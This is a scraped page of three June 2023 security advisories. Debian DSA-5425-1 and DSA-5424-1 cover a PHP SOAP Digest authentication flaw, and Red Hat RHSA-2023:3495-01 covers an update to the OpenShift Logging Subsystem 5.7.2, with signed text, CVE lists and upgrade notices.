    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5425-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the stable distribution (bookworm), this problem has been fixed inversion 8.2.7-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIy9sACgkQEMKTtsN8TjbZKxAAkxlsoOX/Gqfw5W0hKEFjJ0CYIxk4ghwg1N+o4e9Ko7BoVIFnFeVB4dTes0DIbGpp8nBpsh5ynQ6iZePQyD3qI0BTS9TCEAuzVQTq9gcWW6m2I9YxSlWDv2uhHTuwFv/V0Qa+j57v1Rbp2boF/D/Mygi3A4ctFI5KveFejSPuPYSlZTijFjWMD0jL8ledgP3Gzu4p/c+tHwapkgBsFj2LmyHVAodnTm0YngYEd82j78Ez2qoyUVyNBfSfv0YcFBDEb+WTzZ6jCZTOTtMGtEknH3/G+DMr4P3/zzpp6iWYe/SlPI2tmeqY6/hGi8VBiKt1SSdlRKjkmLPR+FZy0GrDuuFU6xrrxLtlGpyaoXE5scF+yqbHgRJAIrPg+7THWQd9vYJDu5ZaBh/hsFvMRqsIGksGp9J5jqUjoEcpBuafrjrvYcKA2hyqvQLseUCZUXk/ZG9Osp0sZ2B29RQ3naTgE38kuyZ3V8ae+zlwdJRcewr5XVvPcTlDnLiIL/c9sH203fHe1iFwevNERrU9gdxYxqllsWL4CaOZW6M4Yfb5+Dd4ilmUkDr5US2wnuU57QbQHu9LSR1Sjav710gATpNL2JfyC+SlGgD96u6Zz4Cxo2alEpF/rW8jBg4gnbyWePRjTVuIadeopR67nwVhOJooz85oVN+NuN1WpGdJxYhhUNs=0RKf-----END PGP SIGNATURE-----

Debian Security Advisory 5425-1

Debian Linux Security Advisory 5424-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5424-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the oldstable distribution (bullseye), this problem has been fixedin version 7.4.33-1+deb11u4.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIyvIACgkQEMKTtsN8TjYdURAAmtKmyN+UIZIfOHkrg4DxpNL2dwSBcUefcozb5CYvo8R0RQJt62Ce+aI+nP6UXn0GCTzepfzJPGHS93t4BPNvxIQmp8jlofkRX1/Lnrg3ndPPtop+eQhmwdOq65app3kj/sa7b6sZKbsgbvayHu5eo1pRO0DCFIdHamDVcW1RFzJSCNOpsk6L9LjFqvOss5I8WXzL3z2TVGb20rv5LG78/nfPNgLIr63faG7XA2hQgCkT1iIlY8qT1IOTyKHxMWEnDFxZnnHWOFV3DF8iPF8EjmBKDAaEWWwOeIkk5Kiu4Jj8RayC0Gs6KPA0OI0NJ1ejdvGDa1SbJOqvtX5QHzc+jqqrpKlmtc2zHLezH9YZW802jkMOvxI65zepbYRXMsIqmDi624v5eJQh6qytl9YeLAsoJZfHw6Ic4RmpYfE/bsibX+y98TnKbDeUbkAOtG7m6kDobYQ8FXiY/dGK0jWLkcMCbU9lP4onL7s3SshJJEKgeyE17av2LUSJrPszxcD6wKbUj8hchn0t6AKtAKPMk8YHPS5mnUVd2jkNzgAmu7PrWgtoK94dfby1SB62HN129+6GMO67VQhEHQjgsbubnYRYq92+qKpZ0bvq7Oq54G9XYcRzsoGCXkBhQnoqei8PSSKchWEd887q4sFxUmZYgqSN9xtNJSzOX/lv07bYNHM=4iUa-----END PGP SIGNATURE-----

Debian Security Advisory 5424-1

Red Hat Security Advisory 2023-3495-01 - Logging Subsystem 5.7.2 - Red Hat OpenShift. Issues addressed include cross site scripting and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.7.2 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2023:3495-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3495  
Issue date:        2023-06-12  
CVE Names:         CVE-2021-26341 CVE-2021-33655 CVE-2021-33656  
                   CVE-2022-1462 CVE-2022-1679 CVE-2022-1789  
                   CVE-2022-2196 CVE-2022-2663 CVE-2022-3028  
                   CVE-2022-3239 CVE-2022-3522 CVE-2022-3524  
                   CVE-2022-3564 CVE-2022-3566 CVE-2022-3567  
                   CVE-2022-3619 CVE-2022-3623 CVE-2022-3625  
                   CVE-2022-3627 CVE-2022-3628 CVE-2022-3707  
                   CVE-2022-3970 CVE-2022-4129 CVE-2022-20141  
                   CVE-2022-25147 CVE-2022-25265 CVE-2022-30594  
                   CVE-2022-36227 CVE-2022-39188 CVE-2022-39189  
                   CVE-2022-41218 CVE-2022-41674 CVE-2022-41723  
                   CVE-2022-42703 CVE-2022-42720 CVE-2022-42721  
                   CVE-2022-42722 CVE-2022-43750 CVE-2022-47929  
                   CVE-2023-0394 CVE-2023-0461 CVE-2023-1195  
                   CVE-2023-1582 CVE-2023-2491 CVE-2023-22490  
                   CVE-2023-23454 CVE-2023-23946 CVE-2023-25652  
                   CVE-2023-25815 CVE-2023-27535 CVE-2023-27539  
                   CVE-2023-28120 CVE-2023-29007  
====================================================================  
1. Summary:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* rubygem-rack: denial of service in header parsing (CVE-2023-27539)

* rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
(CVE-2023-28120)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2179637 - CVE-2023-28120 rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing

5. JIRA issues fixed (https://issues.redhat.com/):

LOG-3314 - [fluentd] The passphrase can not be enabled when forwarding logs to Kafka  
LOG-3316 - openshift-logging namespace can not be deleted directly when use lokistack as default store.  
LOG-3330 - run.sh shows incorrect chunk_limit_size if changed.  
LOG-3445 - [vector to loki]  validation is not disabled  when tls.insecureSkipVerify=true  
LOG-3749 - Unability to configure nodePlacement and toleration for logging-view-plugin  
LOG-3784 - [fluentd http] the defaut value HTTP content type application/x-ndjson is unsupported on datadog  
LOG-3827 - [fluentd http] The passphase isn't generated in fluent.conf  
LOG-3878 - [vector] PHP multiline errors are collected line by line when detectMultilineErrors is enabled.  
LOG-3945 - [Vector] Collector pods in CrashLoopBackOff when ClusterLogForwarder pipeline has space in between the pipeline name.  
LOG-3997 - Add http to log_forwarder_output_info metrics  
LOG-4011 - [Vector] Collector not complying with the custom tlsSecurityProfile configuration.  
LOG-4019 - [release-5.7] fluentd multiline exception plugin fails to detect JS client exception  
LOG-4049 - [release-5.7] User can list labels and label values for all user workload namespaces via Loki Label APIs  
LOG-4052 - [release-5.7] Fix Loki timeouts querying logs from OCP Console  
LOG-4098 - [release-5.7] No log_forwarder_output_info for splunk and google logging  
LOG-4151 - Fluentd fix  missing nil check for rotated_tw in update_watcher  
LOG-4163 - [release-5.7] TLS configuration for multiple Kafka brokers is not created in Vector  
LOG-4185 - Resources, tolerations and nodeSelector for the collector are missing  
LOG-4218 - Vector fails to run when configuring syslog forwarding for audit log  
LOG-4219 - Vector handles journal log as container log when enabling syslog forwarding. It breaks the compatibility with Fluentd  
LOG-4220 - [RHOCP4.11] Logs of POD which doesn't have labels specified by structuredTypeKey are parsed to JSON, and forwarded to app-xxxxxx  
LOG-4221 - [release-5.7] Fluentd wrongly closes a log file due to hash collision

6. References:

https://access.redhat.com/security/cve/CVE-2021-26341  
https://access.redhat.com/security/cve/CVE-2021-33655  
https://access.redhat.com/security/cve/CVE-2021-33656  
https://access.redhat.com/security/cve/CVE-2022-1462  
https://access.redhat.com/security/cve/CVE-2022-1679  
https://access.redhat.com/security/cve/CVE-2022-1789  
https://access.redhat.com/security/cve/CVE-2022-2196  
https://access.redhat.com/security/cve/CVE-2022-2663  
https://access.redhat.com/security/cve/CVE-2022-3028  
https://access.redhat.com/security/cve/CVE-2022-3239  
https://access.redhat.com/security/cve/CVE-2022-3522  
https://access.redhat.com/security/cve/CVE-2022-3524  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-3566  
https://access.redhat.com/security/cve/CVE-2022-3567  
https://access.redhat.com/security/cve/CVE-2022-3619  
https://access.redhat.com/security/cve/CVE-2022-3623  
https://access.redhat.com/security/cve/CVE-2022-3625  
https://access.redhat.com/security/cve/CVE-2022-3627  
https://access.redhat.com/security/cve/CVE-2022-3628  
https://access.redhat.com/security/cve/CVE-2022-3707  
https://access.redhat.com/security/cve/CVE-2022-3970  
https://access.redhat.com/security/cve/CVE-2022-4129  
https://access.redhat.com/security/cve/CVE-2022-20141  
https://access.redhat.com/security/cve/CVE-2022-25147  
https://access.redhat.com/security/cve/CVE-2022-25265  
https://access.redhat.com/security/cve/CVE-2022-30594  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-39189  
https://access.redhat.com/security/cve/CVE-2022-41218  
https://access.redhat.com/security/cve/CVE-2022-41674  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/cve/CVE-2022-42720  
https://access.redhat.com/security/cve/CVE-2022-42721  
https://access.redhat.com/security/cve/CVE-2022-42722  
https://access.redhat.com/security/cve/CVE-2022-43750  
https://access.redhat.com/security/cve/CVE-2022-47929  
https://access.redhat.com/security/cve/CVE-2023-0394  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1195  
https://access.redhat.com/security/cve/CVE-2023-1582  
https://access.redhat.com/security/cve/CVE-2023-2491  
https://access.redhat.com/security/cve/CVE-2023-22490  
https://access.redhat.com/security/cve/CVE-2023-23454  
https://access.redhat.com/security/cve/CVE-2023-23946  
https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-27539  
https://access.redhat.com/security/cve/CVE-2023-28120  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIfBndzjgjWX9erEAQj/Vg/8D/xYKPgCJDjD2IbguRkgOWsZ5r5BP36n  
pbizOqZem1fs5J1oxmKotej5vE/BD5iumTsNYY59E1y/MjrBYPkaTjnHwgxkNYq/  
Lptwmt7pc2jE92E4qUMa5LpUhJxLQfw10SAMmYFVJIqOjVh+82XhU5NW5bJYStRs  
767suxjFzYZs8CHwpVyBVqEfI/sCyU+Ok3Pja5McaPjomAt9cNYfXoaPUSq3UMMD  
ifVOjVz3fE8YY6UhmVY5SPHrG4Ak2YcKOpyJ/A3UjRuKOTrtnLSxtLZisH4UMetZ  
R0e2ovt1TP4emH9Cblhl18qZxfi6RsveAwQ3IUplCltSRMbl7hrLB11cbAUUoPPc  
+MGvw6id7BHpH/0pBR1u7HH04VlzK/J1/pAiJNR3uL8W4OomgF9A5oSXSoJ9mY9C  
hFjUvQp7rR3+l9ivIT5pb//7lGBJs+QIn/W8OJXWEdqUMpC1ybPnJX7+azLUjLAt  
w7WEuMS7usNdDAUzP/sYFVlHfsNtOKHvx8c+DUi8ti9gkaXakw6VZIUh0g3ZUvmi  
hUWP7oktj6dZyISk75TpmpPppL5pmlKoHREJgiohSXUnFtp/XsYRAoZRfMbbqKr4  
MmyT7J11sfRH5+M1294PtdYJodXu13GESfjW38urAhVE/1SLpvWMQTv7U9CnDimF  
m78/igCYu/A=NjOC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#php